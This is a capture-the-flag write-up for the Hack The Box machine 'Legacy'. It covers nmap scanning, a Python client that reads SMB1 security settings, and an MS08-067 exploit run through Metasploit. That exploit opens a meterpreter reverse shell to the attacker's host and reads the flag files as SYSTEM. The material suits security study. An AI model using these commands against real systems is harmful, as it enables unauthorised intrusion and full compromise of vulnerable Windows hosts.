Box Info
  • Name: Legacy
  • OS: Windows
  • Difficulty: Easy
  • Machine Creator: ch4p

Introduction

Legacy is a relatively easy box running SMB on Windows XP (the service banner reports "Windows 2000 LAN Manager", which is just the SMB1 stack XP ships with). We identify the vulnerability (MS08-067) with Metasploit and the exploit lands us directly as the privileged user NT AUTHORITY\SYSTEM, so no separate privilege escalation step is needed.

Scanning and Information Gathering

Nmap Scan

nmap -p- -T4 --min-rate=1000 -oN ports.out 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun  3 15:40:41 2022 as: nmap -p- -T4 -min-rate=1000 -oN ports.out 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

# Nmap done at Fri Jun  3 15:42:09 2022 -- 1 IP address (1 host up) scanned in 87.81 seconds
nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun  3 15:43:24 2022 as: nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:dc:06 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-06-08T20:41:24+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun  3 15:44:35 2022 -- 1 IP address (1 host up) scanned in 71.43 seconds
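As an added example (not part of the original writeup) of what the smb-security-mode and smb2-time script results above actually measure: the following Python client sends a single SMB1 NEGOTIATE request and decodes the SecurityMode byte of the reply, which is where nmap reads the authentication level, challenge/response support and message signing from. It assumes the field layout in MS-CIFS, offers only the three dialects listed in DIALECTS and deliberately does not request extended security so the reply ends with the classic challenge + domain trailer. The response it parses offline is constructed to match the nmap output for Legacy (user-level security, challenge/response, signing disabled, workgroup HTB), not a capture from the box; pass a host as the first argument to run it against a live target on 445 (port 139 would first need a NetBIOS session request, which this client does not send).

```python
import socket
import struct
import sys

# Dialects offered in preference order; the server answers with the index of
# the highest one it supports (Windows XP picks "NT LM 0.12").
DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12"]
SMB_COM_NEGOTIATE = 0x72
SMB1_HEADER = "<4sBIBHH8sHHHHH"   # 32-byte SMB1 header, MS-CIFS 2.2.3.1
NEGOTIATE_WORDS = "<HBHHIIIIQhB"  # 17 parameter words of the NT LM 0.12 reply

# SecurityMode bits of the NEGOTIATE response (MS-CIFS 2.2.4.52.2)
USER_SECURITY = 0x01        # user-level rather than share-level authentication
ENCRYPT_PASSWORDS = 0x02    # challenge/response rather than plaintext passwords
SIGNATURES_ENABLED = 0x04   # message signing supported
SIGNATURES_REQUIRED = 0x08  # message signing required

def _netbios(smb: bytes) -> bytes:
    """Prefix a NetBIOS session header: type 0x00 followed by a 3-byte length."""
    return struct.pack(">I", len(smb)) + smb

def build_negotiate_request() -> bytes:
    """SMB_COM_NEGOTIATE without the extended-security flag, so the reply ends
    with the challenge + domain trailer that parse_negotiate_response reads."""
    header = struct.pack(SMB1_HEADER, b"\xffSMB", SMB_COM_NEGOTIATE, 0,
                         0x18,    # Flags: case-insensitive, canonicalized paths
                         0xC001,  # Flags2: unicode | NT status codes | long names
                         0, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    dialects = b"".join(b"\x02" + d + b"\x00" for d in DIALECTS)
    return _netbios(header + struct.pack("<BH", 0, len(dialects)) + dialects)

def parse_negotiate_response(data: bytes) -> dict:
    """Decode the fields nmap's smb-security-mode script reports."""
    smb = data[4:]                       # strip the NetBIOS session header
    if smb[:4] == b"\xfeSMB":
        raise ValueError("server answered with SMB2: SMB1 is not offered")
    if smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_NEGOTIATE:
        raise ValueError("not an SMB1 NEGOTIATE response")
    status, = struct.unpack_from("<I", smb, 5)
    flags2, = struct.unpack_from("<H", smb, 10)
    if status != 0 or smb[32] != 17:     # WordCount must be 17 for NT LM 0.12
        raise ValueError(f"negotiate failed: status=0x{status:08x}")
    (dialect_index, mode, _mpx, _vcs, _maxbuf, _maxraw, _key, _caps, _time,
     _tz, challenge_len) = struct.unpack_from(NEGOTIATE_WORDS, smb, 33)
    if dialect_index >= len(DIALECTS):   # 0xFFFF = no offered dialect accepted
        raise ValueError("server accepted none of the offered dialects")
    byte_count, = struct.unpack_from("<H", smb, 67)
    trailer = smb[69:69 + byte_count]    # challenge, then the server's domain
    domain_raw = trailer[challenge_len:]
    domain = (domain_raw.decode("utf-16-le") if flags2 & 0x8000
              else domain_raw.decode("latin-1")).rstrip("\x00")
    if mode & SIGNATURES_REQUIRED:
        signing = "required"
    elif mode & SIGNATURES_ENABLED:
        signing = "supported"
    else:
        signing = "disabled"             # what nmap calls "dangerous, but default"
    return {
        "dialect": DIALECTS[dialect_index].decode(),
        "authentication_level": "user" if mode & USER_SECURITY else "share",
        "challenge_response": "supported" if mode & ENCRYPT_PASSWORDS else "plaintext",
        "message_signing": signing,
        "domain": domain,
    }

def build_sample_response(mode: int = USER_SECURITY | ENCRYPT_PASSWORDS,
                          dialect_index: int = 2, domain: str = "HTB") -> bytes:
    """Constructed reply (not a capture from the box) in the shape Windows XP
    returns; the default mode mirrors the nmap output for Legacy."""
    header = struct.pack(SMB1_HEADER, b"\xffSMB", SMB_COM_NEGOTIATE, 0,
                         0x98, 0xC001, 0, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    challenge = bytes(range(8))          # 8-byte NTLM challenge (constructed)
    words = struct.pack(NEGOTIATE_WORDS, dialect_index, mode, 50, 1, 16644,
                        65536, 0, 0x0000E3FD, 0, 0, len(challenge))
    trailer = challenge + (domain + "\x00").encode("utf-16-le")
    return _netbios(header + bytes([17]) + words
                    + struct.pack("<H", len(trailer)) + trailer)

def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed during NEGOTIATE")
        buf += chunk
    return buf

def negotiate(host: str, port: int = 445, timeout: float = 5.0) -> dict:
    """Run the exchange against a live host and parse the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate_request())
        head = _recv_exact(sock, 4)
        length = struct.unpack(">I", head)[0] & 0x00FFFFFF
        return parse_negotiate_response(head + _recv_exact(sock, length))

if __name__ == "__main__":
    result = (negotiate(sys.argv[1]) if len(sys.argv) > 1
              else parse_negotiate_response(build_sample_response()))
    for key, value in result.items():
        print(f"{key}: {value}")
```

A host that has SMB1 disabled either closes the connection or answers with an SMB2 header (0xFE "SMB"); the parser reports that as an error, which is the mirror image of the "Protocol negotiation failed (SMB2)" line nmap prints for this SMB1-only box. A signing value of "disabled" means nothing authenticates the individual SMB messages, so anyone on the path can tamper with or relay the session, which is why nmap flags it as dangerous.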

Exploiting

We follow the "139,445 - Pentesting SMB" page from HackTricks.

In msfconsole (msf6) we search for an SMB exploit against Windows XP / Windows 2000, since the nmap fingerprint reports "Windows XP (Windows 2000 LAN Manager)".

We pick exploit/windows/smb/ms08_067_netapi, the stack-based buffer overflow in the Server service's path canonicalization code (netapi32.dll) reachable over the SRVSVC named pipe, because it is ranked "great" and supports "Check: Yes", so running check before run confirms the target is vulnerable without firing the exploit.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.139     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.139:4444
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.129.227.181
[*] Meterpreter session 3 opened (10.10.14.139:4444 -> 10.129.227.181:1036) at 2022-06-03 16:19:32 +0000

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Under C:\Documents and Settings there are two real user profiles, Administrator and john; the remaining entries are the built-in service accounts and the profile templates.

meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2017-03-16 06:07:21 +0000  Administrator
040777/rwxrwxrwx  0     dir   2017-03-16 05:29:48 +0000  All Users
040777/rwxrwxrwx  0     dir   2017-03-16 05:33:37 +0000  Default User
040777/rwxrwxrwx  0     dir   2017-03-16 05:32:52 +0000  LocalService
040777/rwxrwxrwx  0     dir   2017-03-16 05:32:43 +0000  NetworkService
040777/rwxrwxrwx  0     dir   2017-03-16 05:33:42 +0000  john

The user flag is at C:\Documents and Settings\john\Desktop\user.txt:

meterpreter > pwd
C:\Documents and Settings\john\Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:19:49 +0000  user.txt

meterpreter > cat user.txt
e69a███████████████████████7644f

And the root flag is at C:\Documents and Settings\Administrator\Desktop\root.txt:

meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:18:50 +0000  root.txt

meterpreter > cat root.txt
9934███████████████████████d5713